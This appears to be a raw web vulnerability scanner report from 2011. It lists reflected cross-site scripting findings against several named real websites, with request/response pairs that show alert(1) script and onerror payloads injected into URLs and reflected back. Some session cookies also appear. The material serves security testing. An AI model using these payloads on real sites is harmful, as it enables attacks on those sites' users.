| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:18 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5125 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <!-- re_url = /togaf9/certa8972--><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /togaf9/cert/ |
| GET /togaf9/cert296c2"><script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:09 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5122 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <input type=hidden name=lost value="/togaf9/cert296c2"><script>alert(1)< ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.opengroup.org |
| Path: | /togaf9/cert/ |
| GET /togaf9/certe1cf2<script>alert(1)< Host: www.opengroup.org Proxy-Connection: keep-alive Referer: http://www.opengroup.org Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=30649185 |
| HTTP/1.1 404 Not Found Date: Mon, 28 Feb 2011 17:52:15 GMT Server: Apache/1.3.37 (Unix) PHP/4.4.4 Content-Type: text/html Content-Length: 5116 <html> <head> <title>Not found</title> <link rel="stylesheet" href="https://www </head> <link href="/stylesheets2 ...[SNIP]... <br> http://www.opengroup.org ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.paperthin.com |
| Path: | /_cs_apps/ajaxProxy.cfm |
| GET /_cs_apps/ajaxProxy.cfm Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:16:29 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Pragma: no-cache Expires: {ts '2011-02-26 18:16:29'} Content-Type: text/html; charset=UTF-8 Content-Length: 1638 <script type="text/javascript" src="/ADF/thirdParty <!-- ADF Lightbox Framework Loaded @ {ts '2011-02-26 18:16:29'} --> <script type='text/javascript' s ...[SNIP]... </script> The Bean: twitterService7e534<img src=a onerror=alert(1) |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.paperthin.com |
| Path: | /_cs_apps/ajaxProxy.cfm |
| GET /_cs_apps/ajaxProxy.cfm Host: www.paperthin.com Proxy-Connection: keep-alive Referer: http://www.paperthin.com X-Requested-With: XMLHttpRequest Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: CFID=2258135; CFTOKEN=51840065; __utmz=259978379 |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:16:36 GMT Server: Apache/2.2.14 (Win32) DAV/2 SVN/1.6.6 JRun/4.0 PHP/5.2.13 Pragma: no-cache Expires: {ts '2011-02-26 18:16:36'} Content-Type: text/html; charset=UTF-8 Content-Length: 1638 <script type="text/javascript" src="/ADF/thirdParty <!-- ADF Lightbox Framework Loaded @ {ts '2011-02-26 18:16:36'} --> <script type='text/javascript' s ...[SNIP]... </script> The Bean: twitterService with method: buildUtilityTweetHTML998c7<img src=a onerror=alert(1) |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.prchecker.info |
| Path: | /check_page_rank.php |
| GET /check_page_rank.php/27f50"><script>alert(1)< Host: www.prchecker.info Proxy-Connection: keep-alive Referer: http://www.prchecker.info Cache-Control: max-age=0 Origin: http://www.prchecker.info Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=d8830cccd5 |
| HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 01:34:46 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 27444 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <html> <title> ...[SNIP]... <form action="/check_page_rank ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.prchecker.info |
| Path: | /check_page_rank.php |
| GET /check_page_rank.php Host: www.prchecker.info Proxy-Connection: keep-alive Referer: http://www.prchecker.info Cache-Control: max-age=0 Origin: http://www.prchecker.info Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: PHPSESSID=d8830cccd5 |
| HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 01:34:45 GMT Server: Apache X-Powered-By: PHP/5.2.13 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 27543 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <html> <title> ...[SNIP]... <input type="text" value="http://cloudscan ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.sti-cs.com |
| Path: | /Portfolio/Trades-and |
| GET /Portfolio/Trades-and Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581 |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:18:55 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14545 ... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title> <script type="text/javascript" language="javascript ...[SNIP]... s.com/admin/imageproject portfolio25[1][1]='Awards Logo design'; portfolio25[1][2]='22940b portfolio25[1][3]='229'; portfolio25[1][4]='25'; var CurrentPageId='24c8e9b</script><script </script> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.sti-cs.com |
| Path: | /Portfolio/Trades-and |
| GET /Portfolio/Trades-and Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581 |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:19:02 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14545 ... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title> <script type="text/javascript" language="javascript ...[SNIP]... s.com/admin/imageproject portfolio25[1][1]='Awards Logo design'; portfolio25[1][2]='22940b portfolio25[1][3]='229'; portfolio25[1][4]='25'; var CurrentPageId='2598f92</script><script </script> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.sti-cs.com |
| Path: | /Portfolio/Trades-and |
| GET /Portfolio/Trades-and Host: www.sti-cs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=249072581 |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:18:51 GMT Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635 X-Powered-By: PHP/5.2.13 Connection: close Content-Type: text/html Content-Length: 14544 ... <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Trades and Exhibits :: STI - Creative Services</title> <script type="text/javascript" language="javascript ...[SNIP]... cs.com/admin/imageproject portfolio25[1][1]='Awards Logo design'; portfolio25[1][2]='22940b portfolio25[1][3]='229'; portfolio25[1][4]='25'; var CurrentPageId='74e625</script><script </script> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.virtusa.com |
| Path: | /applications/userlogin |
| GET /applications/userlogin Host: www.virtusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=213023891 |
| HTTP/1.1 200 OK Cache-Control: private Content-Length: 2672 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 01 Mar 2011 17:02:22 GMT Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv=" ...[SNIP]... <input type="hidden" name="fn" id="fn" value="practicebrochure ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.virtusa.com |
| Path: | /common/exitpage.asp |
| GET /common/exitpage.asp Host: www.virtusa.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=213023891 |
| HTTP/1.1 200 OK Cache-Control: private Content-Length: 2085 Content-Type: text/html Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Tue, 01 Mar 2011 17:02:11 GMT Connection: close <style> body{ padding:0; margin:0; font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #333; } #contentarea{ display:block; padding-top:10px; } #tbl{ display ...[SNIP]... <a href="http://www.gartner ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.watchmouse.com |
| Path: | /assets/css/print.css |
| GET /assets/css/print.css291e9'-alert(1)- Host: www.watchmouse.com Proxy-Connection: keep-alive Referer: http://www.watchmouse.com Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 404 Not Found Date: Sun, 27 Feb 2011 01:37:31 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-23e31667bc72ad Content-Language: en P3P: policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 13816 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173 var serverRef = encodeURIComponent('http: if(document && document.referrer){ jsRef = encodeURIComponent }else{ jsRef = ''; ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.watchmouse.com |
| Path: | /assets/css/screen.css |
| GET /assets/css/screen.css8adcd'-alert(1)- Host: www.watchmouse.com Proxy-Connection: keep-alive Referer: http://www.watchmouse.com Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 404 Not Found Date: Sun, 27 Feb 2011 01:37:32 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-b162fa23d063ab Content-Language: en P3P: policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 13826 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173 var serverRef = encodeURIComponent('http: if(document && document.referrer){ jsRef = encodeURIComponent }else{ jsRef = ''; ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.watchmouse.com |
| Path: | /en/ |
| GET /en3c623'-alert(1)- Host: www.watchmouse.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 404 Not Found Date: Sun, 27 Feb 2011 01:36:45 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-014c46aed482ac Content-Language: en P3P: policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 13508 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173 var serverRef = encodeURIComponent(''); if(document && document.referrer){ jsRef = encodeURIComponent }else{ jsRef = ''; } requestParams = 'vjsRef='+jsRef ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.watchmouse.com |
| Path: | /en/ |
| GET /en/?41203'-alert(1)- Host: www.watchmouse.com Proxy-Connection: keep-alive Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 01:36:29 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-fff3e345c354e4 Content-Language: en P3P: policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 18498 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173 var serverRef = encodeURIComponent(''); if(document && document.referrer){ jsRef = encodeURIComponent }else{ jsRef = ''; } requestParams = 'vjsRef='+jsR ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.watchmouse.com |
| Path: | /en/api/checkreferrer.php |
| GET /en/api/checkreferrer.phpa0d30'-alert(1)- Host: www.watchmouse.com Proxy-Connection: keep-alive Referer: http://www.watchmouse.com X-Requested-With: XMLHttpRequest Accept: text/html, */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: __utmz=165779128 |
| HTTP/1.1 404 Not Found Date: Sun, 27 Feb 2011 01:37:20 GMT Server: Apache/2.2.9 (Debian) X-Powered-By: PHP/5.2.6-1+lenny9 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache ETag: "0-en-f7f299238f15fb Content-Language: en P3P: policyref="/w3c/p3p.xml" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Length: 14505 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head><tit ...[SNIP]... <![CDATA[ function checkReferrer(){ var vref_string = encodeURIComponent('173 var serverRef = encodeURIComponent('http: if(document && document.referrer){ jsRef = encode ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://www.winamp.com |
| Path: | /media-player/en |
| GET /media-player/en5c2b5"%3b5abe0529ac9 HTTP/1.1 Host: www.winamp.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UNAUTHID=1.f2ed797a4 |
| HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:45:19 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 46245 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... ryCode = "US"; var playerType = ""; var storeUrlGB = "http://shop.winamp.com var storeBundleUrlGB = "null"; var urlLang = "en5c2b5";5abe0529ac9", osDectect = "Windows 7", dispLanguage = "en-us" , pageType = "", winampplayerFull = "http://download.nullsoft ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.wolframalpha |
| Path: | /input/ |
| GET /input/?i=labor%20day610cb"-alert(1)- Host: www.wolframalpha.com Proxy-Connection: keep-alive Referer: http://duckduckgo.com/?q Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Tue, 01 Mar 2011 02:00:30 GMT Server: Apache-Coyote/1.1 X-UA-Compatible: chrome=1 Content-Type: text/html;charset=UTF-8 Set-Cookie: WR_SID=173.193.214.243 Set-Cookie: JSESSIONID=828A29FB0 Content-Length: 24942 <!DOCTYPE html><html class="no-js"><head> ...[SNIP]... <![CDATA[ */ $(function(){ if("") { recalculate("&i=labor } }); /* ]]> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.wolframalpha |
| Path: | /input/ |
| GET /input/?i=labor%20day&76d96"-alert(1)- Host: www.wolframalpha.com Proxy-Connection: keep-alive Referer: http://duckduckgo.com/?q Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Date: Tue, 01 Mar 2011 02:04:53 GMT Server: Apache-Coyote/1.1 X-UA-Compatible: chrome=1 Content-Type: text/html;charset=UTF-8 Set-Cookie: WR_SID=173.193.214.243 Set-Cookie: JSESSIONID=3887B7536 Content-Length: 36757 <!DOCTYPE html><html class="no-js"><head> ...[SNIP]... 219ecgbi4120fe44f000 recalculate("recalculate } }); /* ]]> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www14.software |
| Path: | /webapp/iwm/web/signup.do |
| GET /webapp/iwm/web/signup.do Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:08 GMT Server: IBM_HTTP_Server Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Language: en-US Set-Cookie: JSESSIONID=0000E Content-Length: 67320 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="/webapp/iwm/web ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www14.software |
| Path: | /webapp/iwm/web/signup.do |
| GET /webapp/iwm/web/signup.do Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:00 GMT Server: IBM_HTTP_Server Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Language: en-US Set-Cookie: JSESSIONID=0000gO8IZ Content-Length: 67320 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="/webapp/iwm/web ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www14.software |
| Path: | /webapp/iwm/web/signup.do |
| GET /webapp/iwm/web/signup.do Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:10 GMT Server: IBM_HTTP_Server Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Language: en-US Set-Cookie: JSESSIONID=0000iq7tv Content-Length: 67320 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="/webapp/iwm/web ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www14.software |
| Path: | /webapp/iwm/web/signup.do |
| GET /webapp/iwm/web/signup.do Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:02 GMT Server: IBM_HTTP_Server Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Language: en-US Set-Cookie: JSESSIONID=0000 Content-Length: 67320 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="/webapp/iwm/web ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www14.software |
| Path: | /webapp/iwm/web/signup.do |
| GET /webapp/iwm/web/signup.do Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:29:58 GMT Server: IBM_HTTP_Server Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Language: en-US Set-Cookie: JSESSIONID=0000GCArT Content-Length: 67320 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="/webapp/iwm/web ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www14.software |
| Path: | /webapp/iwm/web/signup.do |
| GET /webapp/iwm/web/signup.do Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:03 GMT Server: IBM_HTTP_Server Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Language: en-US Set-Cookie: JSESSIONID=0000qQP8L Content-Length: 67320 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... <a href="/webapp/iwm/web ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www14.software |
| Path: | /webapp/iwm/web/signup.do |
| GET /webapp/iwm/web/signup.do Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:12 GMT Server: IBM_HTTP_Server Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Language: en-US Set-Cookie: JSESSIONID=0000-1 Content-Length: 67320 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... /iwm/web/signup.do?source ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | https://www14.software |
| Path: | /webapp/iwm/web/signup.do |
| GET /webapp/iwm/web/signup.do Host: www14.software.ibm.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Sat, 26 Feb 2011 23:30:13 GMT Server: IBM_HTTP_Server Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding Content-Type: text/html; charset=UTF-8 Content-Language: en-US Set-Cookie: JSESSIONID=00005jmud Content-Length: 67330 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... iwm/web/signup.do?source ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://duckduckgo.com |
| Path: | / |
| GET /?q=labor+day HTTP/1.1 Host: duckduckgo.com Proxy-Connection: keep-alive Referer: http://www.google.com Accept: application/xml User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
| HTTP/1.1 200 OK Server: nginx Date: Tue, 01 Mar 2011 01:59:26 GMT Content-Type: text/html; charset=UTF-8 Connection: keep-alive Expires: Tue, 01 Mar 2011 01:59:27 GMT Cache-Control: max-age=1 Content-Length: 7500 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR ...[SNIP]... <script type="text/javascript" ...[SNIP]... |
| Severity: | Low |
| Confidence: | Certain |
| Host: | http://duckduckgo.com |
| Path: | /Assan_language |
| GET /Assan_language HTTP/1.1 Host: duckduckgo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: r=b; _qwerly_session Referer: http://www.google.com |
